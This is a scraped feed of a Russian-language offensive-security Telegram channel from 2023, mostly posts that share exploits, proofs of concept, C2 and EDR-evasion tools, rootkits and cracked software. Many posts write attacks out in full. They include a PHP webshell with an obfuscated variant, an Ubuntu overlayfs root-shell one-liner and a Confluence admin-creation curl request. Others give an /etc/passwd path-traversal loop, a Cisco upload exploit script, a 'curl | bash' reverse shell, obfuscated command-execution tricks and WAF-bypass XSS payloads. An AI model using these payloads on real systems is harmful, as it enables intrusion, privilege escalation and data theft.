Linux Privileges Escalation Techniques (Basic to Advanced) Series*Part 1: http://hacklido.com/blog/158Part 2: http://hacklido.com/blog/162Part 3: http://hacklido.com/blog/210Part 4: http://hacklido.com/blog/224Part 5: https://hacklido.com/blog/286 |
Images
|
2024-01-19 04:09:00 |
CVE-2023-7028 | Account-Take-Over Gitlab*usage:python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com#gitlab |
|
2024-01-18 20:50:29 |
Cobalt-Strike-Profiles-for-EDR-Evasion+ SourcePoint is a C2 profile generator for Cobalt Strikedownload#cs |
Images
|
2024-01-18 12:33:13 |
#pic #linux |
Images
Images
|
2023-12-15 14:09:01 |
Linux Red Team cat /home/redteam/1- Exploitation Techniques2 - Privilege Escalation Techniques3 - Persistence Techniques4 - Defense Evasion - Hiding Linux Processes5 - Defense Evasion - Rootkits#linux #learn #hack |
|
2023-12-15 06:59:31 |
CVE-2023-49070 - Apache ofbizpre-auth RCE POC#apache |
Images
|
2023-12-15 06:53:46 |
CVE-2023-22524 CVSS: 9,6 Уязвимость в приложении Atlassian Companion для macOS (все версии до 2.0.0)*POC#jira |
|
2023-12-14 17:27:03 |
#Xmas |
Images
Images
|
2023-12-14 10:56:09 |
The Art Of Linux PersistenceDecember 13, 2023Про git backdoor прикольноREAD\download#linux #persist |
Images
|
2023-12-14 06:37:06 |
CVE-2023-6553 Exploit Плагин Backup Migration для WordPress , RCE до версии 1.3.7 включительно *exploit#wordpress #rce |
|
2023-12-12 11:29:38 |
FUCK WAFОт Cloudflare до Imperva, Akamai, F5, Checkpoint, Fortinet#waf #bypass #payload #regexp |
|
2023-12-12 07:50:28 |
А еще утекли сорцы\панельки\билдеры у Ermak и Hookbot#malware |
Images
Images
Images
|
2023-12-12 07:46:02 |
😁 lol#ransom |
Images
|
2023-12-11 10:52:46 |
BurpSuite PRO (version 2023.11.1.2) + +BurpBountyPro_v2.7.0#burp |
|
2023-12-10 09:21:34 |
Концепция (PoC) атаки 5G NR на:смартфоны CPE-маршрутизаторыUSB-модемы5Ghoul — это семейство DoS-уязвимостей 5G на уровне реализации, затрагивающих мобильные платформы Qualcomm и MediaTek.+12 доступных эксплойтов* 5ghoul-5g-nr-attacks* |
Images
|
2023-12-09 20:11:51 |
Используем ssh-keygen для:- произвольного выполнения кода- повышения привилегий- перезаписи файловЗабавно (и закономерно) что вектор подходит как для *nix так и для win*Сам researchДополнительный researchlib2shell#ssh |
Images
|
2023-12-09 14:01:40 |
Shellcode Loader with memory evasion *Jomungand#win #shellcodes |
Images
|
2023-12-08 10:51:45 |
Stratosphere Linux IPSНу казалось бы IPS и IPS, бох с ним что на питоне, ведь есть Machine Learning Models.За то как его активно форсят на BlackHat Europe , BlackHat USA, BlackHat Asia, Hack In The Box, OpenAlt, Ekoparty (?)*DownLoad*#ips #ids #обхсс |
Images
|
2023-12-08 06:44:19 |
Курс по фишингу от SkillFARTory, + реальная возможность трудоустройства + диплом ВШЭ_птуlink |
Images
|
2023-12-07 20:51:45 |
чей ключ от домофона ? https://svn.python.org/www/trunk/advocacy.python.org/etc/server.pem#py |
Images
|
2023-12-07 18:29:51 |
RAThXXp:\\43X249X38x36/ |
Images
|
2023-12-05 19:18:30 |
Тут туса и SLAM интересныйПомните атаки Meltdown и Spectre (Intel, AMD, ARM, POWER) ? Ну так вот, трое пацанов взяли проц i9-13900k, ubuntu с ядром 6.3, сделали эмуляцию intel LAM (в ядре 6.4 Linear Address Masking (intel LAM) уже есть ) и используя наработки Spectre смогли прочитать память ядра.В общем этот вот intel LAM позволил создать в и без того дырявой процессорной архитектуре дополнительный канал слива памяти прямо в жирные лапкиSpectre + Intel LAM = SLAM*Почитать можно ТУТСкачать SLAM ТУТ#proc |
|
2023-12-05 11:21:36 |
Погрузиться в методы использования руткитов режима ядра Windows (+ гипервизор)link#windows #rootkits #modules |
Images
|
2023-12-04 11:46:33 |
CVE-2023-49287TinyDir <= 1.2.5 Buffer overflowProof of concept (c 183 строки) |
|
2023-12-03 09:14:15 |
вернуться в 2000е и задеть струны души за полсекунды 😜 |
|
2023-12-01 08:00:45 |
mini_PHP Payload*<?=`$_GET[0]`?><?=`$_POST[0]`?><?=`{$_REQUEST['_']}`?>*Usage : bashorg.com/path/to/shell.php?0=command*Obfuscation :<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?> |
|
2023-11-28 14:53:04 |
LOOOOLНашли до чего доебаться, еще и тикет открыли ))webshell exists in the project |
|
2023-11-25 07:30:51 |
IDA_pro - 8.3 final release + keygen#IDApro |
|
2023-11-24 19:06:49 |
Active Directory Canarieslink |
Images
|
2023-11-24 06:11:52 |
Надеюсь JOY CASINO |
Images
|
2023-11-23 19:19:04 |
CobaltStrike в Chrome installer с подписью от BreakPoint Software Inc*Strike config |
Images
|
2023-11-23 06:49:44 |
1 - учите питон2 - учите арабский3 - едете в германию работать программистом кассиром в макдач |
Images
|
2023-11-23 06:45:13 |
CVE-2023-49103DetailPOC_exploit (multi-thread) |
|
2023-11-22 20:58:14 |
Мечтает ли товарищ майор об элетроТелеге ? Но не спеши погружаться в философские думы, мой юный друг !Ведь в нашей студии, прости хоспаде - Telegram ExplorerУ которого в описании ЖИР жирокъНу прям RSS на базе православной тележки.Но разговоры в сторону - немедленно выкатываем в продакшен !#Fu |
Images
|
2023-11-22 12:59:55 |
Интересная мультиварка |
|
2023-11-21 12:53:46 |
Это на новый год ! |
Images
|
2023-11-21 10:24:39 |
HavocExploitПраздник у всех любителей фреймфорка Havoc ( post-exploitation command and control framework )*DOS_exploit*Usage:pip install -r requirements.txt./exploit.py -t teamserverip -p port#havoc |
Images
|
2023-11-21 05:22:11 |
Спешим читать свежий выпуск tmpOut 03 за ноябрь 2023 |
Images
|
2023-11-19 06:33:51 |
PassTheCert*Бывает контроллеры домена не поддерживают PKINIT. Это может быть связано с тем, что в их сертификатах нет EKU для входа в систему со смарт-картой. Однако несколько протоколов, включая LDAP, поддерживают Schannel, обеспечивая таким образом аутентификацию через TLS. И вот пацаны с района (возможно Мытищи) создали небольшой инструмент для проверки концепции, который позволяет выполнять аутентификацию на сервере LDAP/S с сертификатом для всяких там атак.*LINK |
Images
|
2023-11-19 06:14:37 |
CVE-2023-46214 - Splunk RCE*Proof of concept exploit#splunk |
|
2023-11-18 12:50:35 |
CVE-2023-4357 Chrome XXE*POCприкольно, осталось песочницу обойти 👌#chrome #sandbox |
Images
Images
|
2023-11-17 19:36:07 |
CVE-2023-47246А вот и 0day который активно юзают рансомы из Cl0p нацеленный на SysAid*exploit* |
Images
|
2023-11-17 06:38:23 |
С днем рождения !!!Сегодня Proxy Bar исполняется 2 года ***Если Вам нравится то что мы делаем, Вы можете нас поддержать:***Bitcoin bc1qe8vmnxeqftjj7qynq8ljyv564j44wqaww8sa82Ethereum 0xa9626b33E39d904b6A48640cA89295323E7402A9Monero 43rmbgj7gy8fwAzuqWNNAbL3K3Eb54khZhY36gkRM8Vv6EVvEQFvSMBEhGyQDY43DWfEsbBY6msmR3GRGt4cC49yVs2jc8k#ДеньРождения |
|
2023-11-16 09:34:00 |
Напоминаем ! Завтра пройдет встреча DEFCON Russia** Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен» * Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)* Формат: офлайн + онлайн-трансляция* зарегистрироваться*Приходите, пообщаемся 😜#defcon #spb |
Images
|
2023-11-15 11:43:43 |
#eL_musico #SOF #8bit |
|
2023-11-15 09:49:37 |
OpenVPN CVE-2023-46849 CVE-2023-46850делить на ноль не бросим 😄😄😄 |
|
2023-11-14 15:06:44 |
200+ PDFHacking and Infosec Link |
Images
|
2023-11-14 05:41:25 |
ved-ebpf: Kernel Exploit and Rootkit Detection using eBPFстатья - тутТулза VED-eBPF - тут#kernel #linux #ebpf #rootkit |
Images
|
2023-11-12 19:09:55 |
Это крутоСтудия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм"eBPF: Unlocking the Kernel" |
|
2023-11-10 20:25:00 |
update для CVE-2023-32629 и CVE-2023-2640BashСИшечка такая |
Images
|
2023-11-10 09:42:53 |
CVE-2023-32629 и CVE-2023-2640Ubuntu Privilege Escalation*BASH одной строкой:unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe |
|
2023-11-09 09:00:35 |
Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;— отличать аномалии от легитимного поведения;— понимать мышление злоумышленника;— формулировать и проверять гипотезы о киберугрозах.Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения. |
Images
|
2023-11-08 09:50:13 |
CVE-2023-46604 ActiveMQ RCEexploit + xml#activemq |
Images
|
2023-11-07 15:48:04 |
VEEAM 😋 Это кладезь привилегированных учетных записей (AD, Linux, Cloud)Лежат себе плохо привинченные, осталось только забрать.В общем читаем и погружаемся:1 - From VEEAM to Domain Administrator2 - Decrypting VEEAM Passwords3 - Используем тулзу SharpVeeamDecryptor#veeam #passwd |
Images
|
2023-11-06 20:02:32 |
Надо ребрендинг канала делать, просто золото ) |
Images
|
2023-11-06 19:07:15 |
CVE-2023-46251 - Stored DOM XSSMyBB < 1.8.37usage:[size='1337px;\">>\<img/src=ccc/ onerror=alert`1`//id=name //&pt;']eviltext[/size]UPD: impact |
Images
|
2023-11-06 09:09:55 |
CVE-2023-22518Confluence Data Center и Confluence Server*exploit.py |
Images
|
2023-11-05 21:25:48 |
Maltrail - Система обнаружения вредоносного трафикаRCE Exploit (version Maltrail-0.53)*exploit.py |
Images
|
2023-11-04 20:09:59 |
Linux hardening guideИнтересная версия еще одного гайда по усилению безопасности linux.Интересно про ptrace и memory allocatorLINK |
Images
|
2023-11-04 11:04:24 |
Give me a ping, Vasily |
Images
|
2023-11-04 10:59:37 |
List of Awesome CobaltStrike Resources link#cobalt |
Images
|
2023-11-02 13:00:20 |
левая короннаяправая похоронная |
Images
|
2023-11-02 09:31:02 |
exploit for cve-2023-46747 F5 BIG-IP unauthenticated remote code execution *exploit |
Images
|
2023-11-01 18:22:10 |
parts=(" /" "us" ";r" " /" ";b" "in" "; /" "who" "a" "mi" "")command="${parts[0]}${parts[1]}${parts[2]}${parts[3]}${parts[4]}${parts[5]}${parts[6]}${parts[7]}${parts[8]}${parts[9]}${parts[10]}"echo $command | tr -d ' ;' | shecho "00101111 01110101 01110011 01110010 00101111 01100010 01101001 01101110 00101111 01110111 01101000 01101111 01100001 01101101 01101001" | perl -lape '$_=pack"(B8)*",@F' | sh |
Images
|
2023-11-01 18:14:39 |
проклято )) |
Images
|
2023-11-01 18:10:03 |
$(echo -e "\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x77\x68\x6f\x61\x6d\x69") |
Images
|
2023-10-31 13:03:03 |
Cisco IOS XECVE-2023-20198POC creates a user named baduser with privilege level 15 |
Images
|
2023-10-31 10:16:33 |
book of secret knowledgeСудя по объему, кто то оцифровал утерянную Александрийскую библиотекуlink |
Images
|
2023-10-30 18:14:52 |
XAMPP v-3.3.0 Buffer Overflow (Unicode + SEH)POC#web #xamp |
|
2023-10-29 06:13:57 |
Просыпаемся, завтракаем 😋 |
Images
Images
|
2023-10-27 20:49:59 |
Собака старая, трюки новые. System Management Mode backdoor for UEFI based platforms*SmmBackdoorNg#backdoor #uefi #smm |
Images
|
2023-10-27 05:53:10 |
RCE on ingress-nginx-controller via Ingress spec.rules.http.paths.path field*Reported June 30, 2022Disclosed October 26, 2023link#nginx #k8s |
|
2023-10-26 09:33:54 |
Script for DDoS attacks by EagleCyberCrew hXXp://47.88.79.56/ECC-DDoS/hXXp://47.88.79.56/succubus/ |
Images
Images
|
2023-10-25 15:10:39 |
None |
|
2023-10-24 20:28:28 |
v2rayNG Xray core and v2fly core client for Android#greypath |
|
2023-10-24 09:45:28 |
CVE-2023-36745MS Exchange Server Privilege Escalationexploit#exchange |
|
2023-10-23 11:53:14 |
😏 |
Images
|
2023-10-22 05:40:03 |
So cool ! ))))link#Назад_в_будущее |
Images
|
2023-10-22 05:19:57 |
Каждый раз смешно )))И мало того, оно даже документировано - Windows Internals part 2#remoteRegistry #135 |
Images
|
2023-10-21 04:50:28 |
CVE-2023-34051VMware Aria Operations for Logs *Technical Deep*Exploit#vmware #bypass #exploit |
Images
|
2023-10-20 18:55:34 |
Cloudflare bypass WAF*Payload:<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;#cloudflare #bypass #waf #xss |
|
2023-10-19 19:54:59 |
Windows rootkit development for red teaming*Part 1 | IntroductionPart 2 | A tale of routines, IOCTLs and IRPsPart 3 | Sailing to the land of the user (and debugging the ship)Part 4 | The call back homePart 5 | Saruman's Manipulation*#malware #windows #rootkit |
|
2023-10-18 18:50:03 |
or winamp 😜#humor |
Images
|
2023-10-18 06:36:14 |
Спасибо Julien Mousqueton за отличную подборку, сам то понял какой инструмент создал ? )))https://ransomware.live/#/status |
Images
|
2023-10-17 10:14:40 |
CVE-2023-2163Linux Kernel: eBPF verifier bug POC |
|
2023-10-16 21:21:29 |
CVE-2023-44487уязвимость в протоколе HTTP/2Пока exploit (заточенный на DOS) ползал в дикой природе под атаку попали Google, AWS, CloudFlare \ etcПик атаки составлял 389 000 000 (да да) запросов в секунду.Ну и конечно же все это уплыло ))))Кстати интересный отчет есть у HAproxy, типа наша хата с краю и вообще наш балансировщик не ДоСится этой уязвимостью.link 1link 2link 3link 4link 5what the fuck notes #DoS #HA |
Images
|
2023-10-16 16:54:29 |
Windows Exploit Protection Settings (powerSHELL))linkТак, стоп, погодите...))) |
Images
|
2023-10-16 13:27:52 |
Ну только если в майку встроены наручники и трансфер до США )))) |
Images
|
2023-10-16 06:32:59 |
Палестино-израильский конфликтДействующие лица через призму мира хакеров и инфосекаСписки#again2012 |
Images
|
2023-10-15 14:33:39 |
vsftpd (для версии 2.3.4)usage:python3 vsftpd_exploit.py <IP address> <port> <command> |
|
2023-10-15 14:04:39 |
CVE-2023-41993POC#Safari #iOS #iPadOS #macOS |
Images
|
2023-10-15 09:08:43 |
Криво пропатчили cve-2023-33297Получился bitcoin botnet ddos attackВидео + описание#btc |
Images
|
2023-10-15 08:56:59 |
macOS RootKit*Умеет фаззить двоичные файлы/драйверы, выполнять чтение/запись ядра, перехватывать функции ядра и пользовательского пространства, устанавливать пользовательские точки останова, заглушку GDB (в разработке), сопоставлять ядра KDK с символами отладки DWARF для выпуска ядер, MachO всех видов, общий доступ к dyld кэши, метаданные Objective C/Swift, библиотеки дампов, внедрение библиотек (например, cycript) и сканирование приложений iOS. |
|
2023-10-14 11:49:33 |
OSCP, OSWE, OSEP, OSED, OSDA, OSWA, que OSWE, OSWP, EXP301, EXP312, WEB300, CEH , CEH v3, CEH v12, CCC , CKLP, Cisco CCNA 200-125 и еще тонна всегоскачать ((((если вы любитель испанского #soclose |
|
2023-10-13 21:03:39 |
Extract the bitlocker recovery keys download2 сценария: linux\windows#bitlocker |
Images
Images
|
2023-10-12 21:22:25 |
АНБ (National Security Agency, NSA) не спит ! И мы не будем.Совсем недавно они выкатывали свежий релиз GHIDRA, Но то ладно, мы со временем Сноудена привыкли. Сегодня выкатили репозиторий ELITEWOLF.В котором плавают различные сигнатуры и аналитика, ориентированные на ICS/SCADA/OT.Занятно, контроллеры там всякие, ребятам из АСУ ТП должно быть интересно.update: а еще интересно что для публикации они используют github, и каждый "отдел" создает свой ОТДЕЛЬНЫЙ репозиторий, прозрачнее не намекнуть ))) #NSA |
Images
|
2023-10-12 18:56:52 |
CVE-2023-27997 FortiGateРазбор - XORtigate: Pre-authentication Remote Code Execution on Fortigate VPNСкачать - exploitДырке 3 месяца - сколько успело проПатчиться расскажет shodan#fortigate #rce |
|
2023-10-12 17:24:36 |
None |
Images
|
2023-10-12 17:24:35 |
None |
|
2023-10-12 17:24:34 |
CVE-2023-42820Дырка в JumpServer (opensource хост-бастион) Usage:python CVE-2023-42820.py -t http://IP:Port -e email -u username |
|
2023-10-12 15:40:55 |
берут на вооружение )))ShellBot Uses Hex IPs to Evade Detection in Attacks on Linux SSH Servers#hideIP #hex #16bit |
|
2023-10-12 12:59:44 |
ДатаСексуалы на месте ? Вся туса в сборе: 0day,rce,dos,eop,xss и дюша метЁлкин Переходите сразу к таблицеТолько вот с CVE-2023-36778 НЕ угадали |
Images
|
2023-10-11 21:12:06 |
Внутри JS ?)) |
Images
|
2023-10-11 20:03:00 |
Cordyceps - род спорыньёвых грибов, пиреномицеты, паразитирующие на определённых видах насекомых. Домен: ЭукариотыЦарство: Грибы*А кроме того это самоинъекционный дроппер на C++, предназначенный для обхода EDR. download#bypass #edr |
Images
|
2023-10-11 18:44:04 |
CVE-2023-22515Confluence Data Center and Server - Broken Access Control VulnerabilityPOC:curl -k -X POST -H "X-Atlassian-Token: no-check" --data-raw "username=adm1n&fullName=admin&email=admin@confluence&password=adm1n&confirm=adm1n&setup-next-button=Next" http://confluence/setup/setupadministrator.action login - adm1n/adm1nПочитать как это работает |
Images
|
2023-10-11 12:18:31 |
Повышаем привилегии via apt-getвсегда смешно#linux #up |
Images
Images
|
2023-10-11 07:56:31 |
Ох твою мать а, не было печали...)))))))))))))))))Короче, план такойНадеюсь консультанты из Xpanamas ciscoTalos |
|
2023-10-11 07:43:03 |
CVE-2023-36802 windows Local Privilege EscalationUsage:Windows_MSKSSRV_LPE_CVE-2023-6802.exe <pid>где pid — это идентификатор процесса (в десятичном формате), который требуется повысить до SYSTEMPOC#win #lpe |
|
2023-10-11 07:04:24 |
Update:How I made a heap overflow in curl#curl #libcurl #ssrf |
Images
|
2023-10-11 05:47:35 |
VULN in CURLget CVE-2023-38545 - поиграться (сегодня patch)#curl |
Images
|
2023-10-11 05:07:57 |
#бгг |
Images
|
2023-10-07 11:37:24 |
Более 100 Hacking / Infosec pdfread\download |
Images
|
2023-10-07 10:30:57 |
From C, with inline assembly, to shellcoderead#C #shell |
Images
|
2023-10-06 21:00:42 |
Abusing Active Directory Certificate ServicesPart One (5 october 2023)#AD |
Images
|
2023-10-06 18:20:45 |
Следим за трендами* exim RCE* Linux glibc LPE* curl RCE* WS_FTPd* admin/admin |
Images
|
2023-10-05 16:50:38 |
SupernovaReal fucking shellcode encryptor (бгг)download#shellcode #enc |
Images
|
2023-10-05 07:07:22 |
Свежий выпуск Inception 7 |
Images
|
2023-10-02 18:41:28 |
Спасибо всем кто поучаствовал. Отдельное спасибо юристу и правоведу #ran #redteam #malware |
Images
|
2023-10-01 07:06:26 |
CVE-2023-42793Authentication Bypass in JetBrains TeamCity CI/CD |
|
2023-10-01 07:04:56 |
Интересное на почитать*When Exploits Arent Binary *Malware as a service (bunnyLoader)*#exploits #malware #read |
|
2023-09-30 05:43:02 |
Что делать, если вас заставляют работать ?! |
Images
|
2023-09-29 17:40:51 |
OffensiveCon 2023Exploit Engineering – Attacking the Linux Kernel76Слайдов |
Images
|
2023-09-29 05:45:19 |
0-day для CVE-2023-4863 носится по интернету (chrome не при чем, дыра в libwebp image library).И все бы ничего, но libwebp интегрирована во всё (ну почти)Список покрытия |
|
2023-09-28 13:17:55 |
CVE-2023-0126SonicWall SMA1000File Read BugPOC: cat file.txt| while read host do;do curl -sk "http://$host:8443/images//////////////////../../../../../../../../etc/passwd" | grep -i 'root:' && echo $host "is VULN";done |
|
2023-09-28 12:23:34 |
CVE-2023-34040Spring-Kafka-Deserialization RCEPOC#apacheKafka |
|
2023-09-28 07:45:13 |
CVE-2023-43770mail server Roundcube*usage:python cve-2023-43770.py -e attacker@gmail.com -p Attack3rPwd -t victim@example.com*POC exploit |
Images
|
2023-09-27 21:54:39 |
😂😂😂😂 |
Images
|
2023-09-27 18:06:52 |
CVE-2023-20209Cisco Expresswayexploit#cisco |
|
2023-09-27 07:22:12 |
CVE-2023-29360Exploit for MSKSSRV.SYS driver POC exploit#lpe #win |
Images
|
2023-09-26 19:31:23 |
CVE-2023-29357Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability affected from 16.0.0 before 16.0.10399.20005 exploit |
|
2023-09-22 10:24:29 |
PhoneSploit ProТеперь бгг универсальный (что бы это ни значило)download |
Images
|
2023-09-22 10:03:52 |
curlshellreverse shell using curl *usage:*Start your listener:./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234On the remote side:curl https://curlshell:1234 | bashdownload#shell #curl |
|
2023-09-20 20:32:57 |
Elasticsearch Stack Overflow VulnerabilityCVE-2023-31419 Exploit👌 |
Images
|
2023-09-19 20:23:08 |
PDF |
Images
|
2023-09-19 11:24:25 |
fortinet-ssl-vpn-bruteforce |
Images
|
2023-09-19 06:47:57 |
мало кто знает, но на самом деле днищще у ЦРУ 11 сентября |
Images
|
2023-09-19 06:37:47 |
Ну что ? протестировали с lockBit новый бот ?Все еще в дауне)) |
Images
Images
|
2023-09-18 08:12:05 |
🤨 |
Images
|
2023-09-18 08:09:39 |
Burp Suite Plugins developmentread book#BurpSuite |
Images
|
2023-09-13 18:46:16 |
X64Hello |
|
2023-09-12 14:42:56 |
Они и |
|
2023-09-12 14:42:09 |
Гю |
|
2023-08-30 07:44:28 |
VcenterKit - тулкит для эксплоитинга и POSTэксплуатации vmware Vcenter*Сплоитов не так много, пока, но оно легко расширяемое - VcenterKit.py*download#vmware #expl #post #kit |
Images
Images
|
2023-08-29 15:27:08 |
CVE-2023-38388Mass Exploit - CVE-2023-38389 < Wordpress < JupiterX Core < Unauthenticated Account TakeoverDork : inurl: wp-content/plugins/jupiterx-core/POC exploit |
Images
|
2023-08-29 13:39:38 |
#ЦИПсО_Talos |
Images
|
2023-08-29 12:34:12 |
oracle java*POC |
Images
|
2023-08-29 12:19:52 |
CVE-2023-36844 , CVE-2023-36845 , CVE-2023-36846 , CVE-2023-36847*Update watchtowr-vs-junos_juniper_2023-08-25.py |
|
2023-08-29 12:18:08 |
CVE-2023-38831Understanding WinRAR Code Execution |
|
2023-08-26 06:46:15 |
Чортова МоскваСкорее б в Питер)))К расчлененочке))) |
Images
|
2023-08-25 10:45:44 |
ПриходитеДелитесь опытомКонтактами, Можно майками ))))....сами понимаете.... |
Images
|
2023-08-25 10:18:56 |
И внутрь) |
|
2023-08-25 10:18:51 |
None |
Images
|
2023-08-25 10:18:33 |
А как вы думали, эти тусы для этого и существуют, руки пожать, мосты навести, проект замутить, etc. Приходите, даже на вход, поздороваемся, пообщаемся)))) |
|
2023-08-25 10:09:26 |
Норм ребята |
|
2023-08-25 10:09:22 |
None |
Images
|
2023-08-24 13:29:39 |
None |
Images
|
2023-08-24 05:30:33 |
IIS - расшифровка данных без appcmd.exePOC |
Images
|
2023-08-23 19:35:11 |
Мир окон\мир дверей\пластмассовый мир победил - нетМИР шелловshells 2014 - 2023 |
Images
|
2023-08-23 13:37:10 |
Подготовка идёт) |
Images
Images
Images
Images
Images
|
2023-08-23 04:10:10 |
Мы ж хотели тебя через забор перекинуть, давай !!! |
Images
|
2023-08-23 03:54:25 |
Напоминаем, что завтра стартует конференция OffZoneПриходите, будет весело !#offzone #moscow #it #cybersec #2023 |
Images
|
2023-08-22 20:07:49 |
Exploitation of Openfire CVE-2023-32315Full WriteUpOpenfire-Bypass exploit |
Images
|
2023-08-22 09:21:28 |
xss.is вы там это, аккуратнее )https://xss.is/proxy.php?image=https%3A%2F%2Fdownloader.disk.yandex.ru%2Fpreview%2F8884af4bd817bbf0937c044879e6bf34afb2d95c1f14c493b4e39564fbdd2475%2F606426dc%2FmzcuBYol1Yb8wOc9K6NXQ_yNT_4nE1QLJw4LTWRpVOT5DDi0QJok4134hlurUPrtjlev1Ud-HWDKjiPFVQAMJw%253D%253D%3Fuid%3D0%26filename%3D%25D0%2590%25D0%25BD%25D0%25B0%25D0%25BB%25D0%25B8%25D0%25B7%2520%25D0%25B7%25D0%25B0%25D1%2589%25D0%25B8%25D1%2589%25D0%25B5%25D0%25BD%25D0%25BD%25D0%25BE%25D1%2581%25D1%2582%25D0%25B8%2520%25D0%25B1%25D0%25B5%25D1%2581%25D0%25BF%25D1%2580%25D0%25BE%25D0%25B2%25D0%25BE%25D0%25B4%25D0%25BD%25D1%258B%25D1%2585%2520%25D1%2581%25D0%25B5%25D1%2582%25D0%25B5%25D0%25B9.%2520%25D0%25A7%25D0%25B0%25D1%2581%25D1%2582%25D1%258C%25201.mp4%26disposition%3Dinline%26hash%3D%26limit%3D0%26content_type%3Dimage%252Fjpeg%26owner_uid%3D0%26tknv%3Dv2%26crop%3D1%26size%3D200x200&hash=35623f35aff8fe146f0dd9044667024d&return_error=1 |
|
2023-08-21 19:22:09 |
Sonicwall rce CVE-2023-34124*metasploit*use exploit/multi/http/sonicwall_shell_injection_cve_2023_34124ну да ну да 🙃Эксплойт объединяет 4-5 различных уязвимостей. Благодаря @fulmetalpackets |
|
2023-08-21 14:41:04 |
HITCON 2023Демонстрация использования AMDCpuProfiler.sys в AMD. Запуская произвольную запись токена EPROCESS, достигается повышение привилегий до уровня SYSTEM. Отключение флага DSE позволяет загружать вредоносный неподписанный драйвер. В презентации также демонстрируется атака на 360 Total Security путем аннулирования его ObRegisterCallbacks, что позволяет выполнять вредоносные действия в процессах 360 Total Security.*Exploit#AMD |
Images
|
2023-08-21 08:49:27 |
CVE-2023-36874 уязвимость в службе отчетов об ошибках, связанная с повышением привилегий, позволявшая получить права администратора на устройстве Windows.*POC exploit*Read - exploit for 0-day Windows Error Reporting Service bug#windows #lpe |
Images
|
2023-08-20 11:57:01 |
OWASP Top 10 - video*download |
Images
|
2023-08-20 05:02:00 |
Отслеживание интересной малвари для Linux (и UNIX).Трэкнуть#linux #malware |
Images
|
2023-08-19 12:04:36 |
CVE-2023-20073Загрузка произвольного файла без проверки подлинности (XSS) в VPN-маршрутизаторах:Cisco RV340, RV340W, RV345, RV345P Usage:#!/usr/bin/bashTARGET="https://0.0.0.0"; \FILENAME="login.html"; \echo "<b>CVE-2023-20073</b> exploit test.<br><script>alert('JS-test')</script>" > $FILENAME; \curl -ksX POST "$TARGET/api/operations/ciscosb-file:form-file-upload" -H "Authorization: 1" -F "pathparam=Portal" -F "fileparam=${FILENAME}" -F "file.path=${FILENAME}" -F "file=@${FILENAME};type=application/octet-stream"; \echo "Access the uploaded file through the following link: $TARGET/$FILENAME"#cisco |
Images
|
2023-08-18 08:59:00 |
dir-300 еще никогда не был так опасен 😀 |
Images
|
2023-08-17 17:16:24 |
Что, если вы запустите сканирование nmap и ВСЕ 65535 портов будут открыты? -A PREROUTING -i eth0 -p tcp -m tcp --dport 23:65535 -j REDIRECT --to-ports 4444 Где 4444 HoneyPot, например.#HA-HA |
Images
|
2023-08-17 16:51:34 |
CVE-2023-3079 google chrome*exploit |
|
2023-08-17 15:51:33 |
Тревожные кадры, а еще там xmprpc естьhttp://dramaalert.com/wp-includes/ |
Images
|
2023-08-17 05:09:53 |
RDP Credential Stealer*download*HowToUse#win #rdp |
Images
|
2023-08-16 13:42:29 |
Я календарь перевернуИ снова RATник в сентябре |
|
2023-08-15 13:56:36 |
Продолжаем публиковать материалы с DefCon 31 SpamChannel Подделка писем с любого домена с помощью MailChannels (+2 миллиона доменов) Упор как всегда на DNS записи SPF и DMARC Пыщь/download |
|
2023-08-15 07:19:41 |
Если нужно быстро сориентироваться по системным вызовам ядра Linux.Числа и параметры для различных архитектур и версий ядра.https://syscalls.mebeim.net#linux #syscalls #arch |
Images
|
2023-08-14 20:36:20 |
WPS Office RCEВерсии: WPS Office 2023 и WPS Office 2019writeUpProofOfConcept |
Images
|
2023-08-14 14:51:00 |
DllNotificationInectionИспользуя концепцию обратных вызовов уведомлений DLL в локальных и удаленных процессах можно вызвать Calc )*WriteUp "must have"*POC |
Images
|
2023-08-14 12:51:34 |
CVE-2023-36664Ghostscript command injection vulnerability PoC exploitexploit#ghostScript #exploit |
Images
|
2023-08-13 09:49:33 |
Продолжаем публиковать материалы с DefCon 31SpamChannelПодделка писем с любого домена с помощью MailChannels (+2 миллиона доменов)Упор как всегда на DNS записи SPF и DMARC Пыщь/download |
|
2023-08-13 07:47:47 |
Утры |
Images
|
2023-08-12 06:16:52 |
Defcon 31 начинает приносить свои первые плодыPOC для обхода EDR в рамках злоупотребления Windows containers frameworkdownload#edr #bypass #defcon |
Images
|
2023-08-11 19:21:50 |
VED-eBPF: Kernel Exploit and Rootkit Detection using eBPF Go#linux #kernel |
Images
|
2023-08-11 11:15:42 |
